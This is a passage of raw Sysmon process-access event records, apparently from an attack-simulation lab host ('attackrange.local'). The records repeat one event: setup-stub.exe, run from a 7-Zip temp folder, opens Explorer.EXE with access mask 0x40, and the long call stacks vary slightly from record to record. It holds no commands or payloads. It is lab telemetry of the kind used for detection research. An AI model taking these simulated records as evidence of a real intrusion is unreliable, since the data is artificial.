10341000x800000000000000016547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\S